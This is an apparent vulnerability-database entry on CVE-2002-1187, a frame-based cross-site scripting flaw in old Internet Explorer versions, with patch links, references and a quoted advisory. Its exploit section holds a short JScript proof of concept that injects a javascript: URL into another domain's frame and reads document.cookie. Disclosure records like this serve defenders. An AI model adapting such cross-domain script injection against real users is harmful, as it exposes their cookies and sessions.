Microsoft Internet Explorer IFrame/Frame Cross-Site Scripting Execution Vulnerability

Vulnerability ID: 1106968    Vulnerability type: Cross-site scripting
Published: 2002-09-09    Updated: 2006-04-07
CVE ID: CVE-2002-1187    CNNVD ID: CNNVD-200212-023
Platform: Windows    CVSS score: 6.8
|Vulnerability Source
https://www.exploit-db.com/exploits/21777
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-023
|Vulnerability Details
Internet Explorer 5.01 through 6.0 contains a cross-site scripting (XSS) vulnerability. A remote attacker can read and execute files on the local operating system via a web page that uses and executes FRAME or IFRAME elements together with JavaScript; also known as "Frames Cross Site Scripting", as demonstrated using the PrivacyPolicy.dlg resource.
|Vulnerability Bulletin
Microsoft has released a patch:
Microsoft Internet Explorer 5.0.1 SP1
  Microsoft q328970: http://www.microsoft.com/windows/ie/downloads/critical/q328970/default.asp
Microsoft Internet Explorer 5.0.1 for Windows 98
  Microsoft q328970: http://www.microsoft.com/windows/ie/downloads/critical/q328970/default.asp
Microsoft Internet Explorer 5.0.1 SP2
  Microsoft q328970: http://www.microsoft.com/windows/ie/downloads/critica
|Vulnerability EXP
source: http://www.securityfocus.com/bid/5672/info

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fail to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications, as the parent can cause script code to be executed within the context of the child domain by setting the URL to the "javascript" protocol, followed by the desired code. Attackers may also execute script code within the "My Computer" Zone, which may have more severe consequences.

<script language="jscript">
// Proof of concept from the advisory: the parent window opens a document from
// another domain in a new (child) window, then sets the URL of the child's first
// frame to a javascript: URL. A vulnerable MSIE runs that script in the child's
// domain instead of refusing the cross-domain access.
onload=function () {
    var oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVictim","width=100,height=100");
    // Wait for the child window to finish loading before touching its frames.
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cookie)";
        },
        7000
    );
}
</script>
|References
http://marc.info/?l=bugtraq&m=103158601431054&w=2
Patch: http://www.iss.net/security_center/static/10066.php
Patch: http://www.microsoft.com/technet/security/bulletin/ms02-066.asp
http://www.securityfocus.com/bid/5672
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A203
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A225